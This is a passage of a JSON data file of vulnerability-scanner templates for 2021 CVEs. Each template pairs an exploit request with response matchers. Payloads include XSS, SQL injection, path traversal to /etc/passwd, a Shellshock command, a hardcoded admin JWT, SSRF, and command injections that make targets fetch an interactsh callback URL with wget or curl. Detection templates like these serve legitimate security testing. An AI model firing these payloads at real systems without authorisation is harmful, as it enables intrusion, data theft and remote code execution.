Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41649","info":{"name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/homeaction.php"],"body":"cat_id=4'&get_seleted_Category=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45092","info":{"name":"Thinfinity Iframe Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lab.html?vpath=//interact.sh"],"matchers":[{"type":"regex","regex":[".*vpath.*","thinfinity"],"condition":"and"}]}]},{"id":"CVE-2021-43287","info":{"name":"Pre-Auth Takeover of Build Pipelines in GoCD","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24910","info":{"name":"WordPress Transposh Translation <1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","{\"result\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27132","info":{"name":"Sercomm VD625 Smart Modems - CRLF Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Disposition: attachment;filename=test.txt","Set-Cookie:CRLFInjection=Test","Location: interact.sh","X-XSS-Protection:0"],"condition":"and"},{"type":"status","part":"header","status":[404]}]}]},{"id":"CVE-2021-22502","info":{"name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /AdminService/urest/v1/LogonResource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"userName\":\"something `wget {{interactsh-url}}`\",\"credential\":\"whatever\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["An error occurred","AUTHENTICATION_FAILED"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-20150","info":{"name":"Trendnet AC2600 TEW-827DRU - Credentials Disclosure","severity":"medium"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ftp_username","ftp_password","ftp_permission","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<input name=\"admin_passwd\" type=\"password\" id=\"admin_passwd\" size=\"20\" maxlength=\"15\" value =\"(.*)\" />"],"part":"body"}]}]},{"id":"CVE-2021-35380","info":{"name":"TermTalk Server 3.24.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file?valore=../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-24915","info":{"name":"Contest Gallery < 13.1.0.6 - SQL injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WpUserId","Username","Usermail"],"condition":"and"},{"type":"word","part":"header","words":["text/csv","filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29156","info":{"name":"LDAP Injection In OpenAM","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/ui/PWResetUserValidation","{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation","{{BaseURL}}/ui/PWResetUserValidation"],"matchers":[{"type":"dsl","dsl":["contains(body, \"jato.pageSession\") && status_code==200"]}]}]},{"id":"CVE-2021-24917","info":{"name":"WordPress WPS Hide Login <1.9.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nReferer: something\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["redirect_to=%2Fwp-admin%2Fsomething&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2021-46073","info":{"name":"Vehicle Service Management System 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /vehicle_service/classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /vehicle_service/classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1\n","GET /vehicle_service/admin/?page=user/list HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script> Test</td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-24731","info":{"name":"Pie Register < 3.7.1.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-json/pie/v1/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nuser_login='+AND+(SELECT+8149+FROM+(SELECT(SLEEP(3)))NuqO)+AND+'YvuB'='YvuB&login_pass=a\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"User credentials are invalid.\")"],"condition":"and"}]}]},{"id":"CVE-2021-42071","info":{"name":"Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40542","info":{"name":"Opensis-Classic 8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37704","info":{"name":"phpfastcache - phpinfo Resource Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php","{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2021-45967","info":{"name":"Pascom CPS Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/pluginscript/..;/..;/..;/getFavicon?host={{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20124","info":{"name":"Draytek VigorConnect 6.0-B3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd","{{BaseURL}}/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40859","info":{"name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/about_state"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"pbx\"","\"dongleStatus\":0","\"macaddr\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37580","info":{"name":"Apache ShenYu Admin JWT - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dashboardUser HTTP/1.1\nHost: {{Hostname}}\nX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["query success","\"userName\":\"admin\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24351","info":{"name":"WordPress The Plus Addons for Elementor <4.1.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","the-plus-addons-for-elementor"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3019","info":{"name":"ffay lanproxy Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../conf/config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"],"condition":"and"},{"type":"word","part":"body","words":["config.admin.username","config.admin.password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37216","info":{"name":"QSAN Storage Manager <3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http_header.php"],"headers":{"X-Trigger-XSS":"<script>alert(1)</script>"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(header), 'x-xss-protection')"]},{"type":"word","part":"body","words":["\"HTTP_X_TRIGGER_XSS\":\"<script>alert(1)</script>\""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-31195","info":{"name":"Microsoft Exchange Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain)//&et=ServerError","mail/bootr.ashx"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-44515","info":{"name":"Zoho ManageEngine Desktop Central - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /STATE_ID/123/agentLogUploader HTTP/1.1\nHost: {{Hostname}}\nCookie: STATE_COOKIE=&_REQS/_TIME/123\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 0"]},{"type":"word","part":"header","words":["UEMJSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24176","info":{"name":"WordPress JH 404 Logger <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["JH 404 Logger"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44139","info":{"name":"Alibaba Sentinel - Server-side request forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"success\":true","\"msg\":\"success\""],"condition":"and"}]}]},{"id":"CVE-2021-41192","info":{"name":"Redash Setup Configuration - Default Secrets Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs","{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Enter your new password:","redash"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43421","info":{"name":"Studio-42 elFinder <2.1.60 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1\nHost: {{Hostname}}\n","GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-26247","info":{"name":"Cacti - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38751","info":{"name":"ExponentCMS <= 2.6 - Host Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Host":"{{randstr}}.tld"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}.tld","EXPONENT.PATH","EXPONENT.URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31589","info":{"name":"BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","bomgar"],"case-insensitive":true,"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24298","info":{"name":"WordPress Simple Giveaways <2.36.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/giveasap/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["= Simple Giveaways"]}]},{"method":"GET","path":["{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46387","info":{"name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iMg src=x onerror=\"prompt(document.domain)\"><form>","Entry Error"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33807","info":{"name":"Cartadis Gespage 8.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["NetpDoDomainJoin:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29006","info":{"name":"rConfig 3.9.6 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /dashboard.php HTTP/1.1\nHost: {{Hostname}}\n","GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"word","part":"body_2","words":["rconfig"]},{"type":"status","part":"header_3","status":[200]}]}]},{"id":"CVE-2021-22054","info":{"name":"VMWare Workspace ONE UEM - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A"],"matchers-condition":"and","matchers":[{"type":"word","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25114","info":{"name":"WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(header_1, \"application/json\")","status_code == 200","contains(body_2, 'other_discount_code_')"],"condition":"and"}]}]},{"id":"CVE-2021-36450","info":{"name":"Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\nHost: {{Hostname}}\n","POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><h1>Test</h1>26\" class=\"loginUserNameText"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrfp_login","group":1,"regex":["csrfp_login=([a-zA-Z0-9]+);"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-24245","info":{"name":"WordPress Stop Spammers <2021.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/stop-spammer-registrations-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Stop Spammers Spam Prevention","Tags:"],"condition":"and"}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["ad\" accesskey=X onclick=alert(1)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20091","info":{"name":"Buffalo WSR-2533DHPL2 - Configuration File Injection","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","POST /images/..%2fapply_abstract.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n\naction=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/Success.htm"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-24227","info":{"name":"Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36748","info":{"name":"PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","status_code_2 == 404","contains(body_1, \"prestashop\")","contains(tolower(header_2), 'index.php?controller=404')","len(body_2) == 0"],"condition":"and"}]}]},{"id":"CVE-2021-28073","info":{"name":"Ntopng Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css","{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"],"matchers-condition":"and","matchers":[{"type":"word","words":["application/json"],"part":"header"},{"type":"word","words":["\"results\":","\"name\":","\"tab\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41460","info":{"name":"ECShop 4.1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /delete_cart_goods.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25112","info":{"name":"WordPress WHMCS Bridge <6.4b - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<strong><img src onerror=alert(document.domain)></strong>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40438","info":{"name":"Apache <= 2.4.48 Mod_Proxy - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?unix:{{repeat(\"A\", 7701)}}|http://{{interactsh-url}}/"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains_all(header, \"X-Interactsh-Version\", \"Server: oast\")","!contains(body, '<h1> Interactsh Server </h1>')"],"condition":"and"}]}]},{"id":"CVE-2021-40875","info":{"name":"Gurock TestRail Application files.md5 Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files.md5","{{BaseURL}}/testrail/files.md5"],"stop-at-first-match":true,"max-size":1000,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["app/arguments/admin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21881","info":{"name":"Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic dXNlcjp1c2Vy\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' #\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46UEFTUw==\nContent-Type: application/x-www-form-urlencoded\n\najax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\"'; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-22145","info":{"name":"Elasticsearch 7.10.0-7.13.3 - Information 